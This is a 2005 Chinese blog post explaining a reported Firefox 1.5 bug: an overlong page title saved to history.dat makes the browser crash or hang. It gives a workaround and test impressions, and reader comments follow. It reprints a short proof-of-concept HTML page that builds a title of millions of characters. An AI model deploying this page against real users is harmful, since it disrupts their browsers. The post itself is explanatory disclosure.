firefox 1.5缓冲区溢出bug
版权声明:可以任意转载,转载时请务必以超链接形式标明文章原始出处和作者信息及本声明。
http://blog.devep.net/virushuo/2005/12/08/firefox-15-buffer-overflow-bug.html
from:http://packetstormsecurity.org/0512-exploits/firefox-1.5-buffer-overflow.txt
为避免这个问题被拿出来危言耸听,我先提前和大家介绍一下。
原因是这样的:
firefox会在history.dat这个文件中保存历史纪录),当碰到一个超长的Title的时候,Firefox同样会把它保存于history.dat中。下次打开Firefox的时候,就会因为缓冲区溢出而崩溃。
解决方法是手工删除掉history.dat文件。
这个问题仅会导致打开浏览器的时候出错,暂时还没有发现其他危害。
ZIPLOCK
我在Freebsd 6,Firefox 1.5测试,没有崩溃,但是会另firefox变得非常慢,然后停止响应。
个人认为,不算太严重的bug,这个测试脚本把标题搞到了5000*500个字符,这也长的夸张了点。不知道IE碰到这么长的标题会如何?有兴趣不妨测试一下,我这里没有IE,不测了。
Mozilla应该会很快修正这个bug。
测试代码:
<html><head><title>heh</title><script type="text/javascript">
function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
</a></body></html>




Comments
经我测试Firefox 1.5和Xp sp2下,没有发现问题,但是装入确实变得迟缓。
也许是因为我的版本和报告Bug的朋友的Build日期不同。
IE我也测试了,因为IE的历史记录保存的是静态的Title,所以不收到这个Code的影响。
Posted by: tinyfool | December 9, 2005 2:21 AM
ie只会保留128位
Posted by: lonelyfox | December 12, 2005 4:39 AM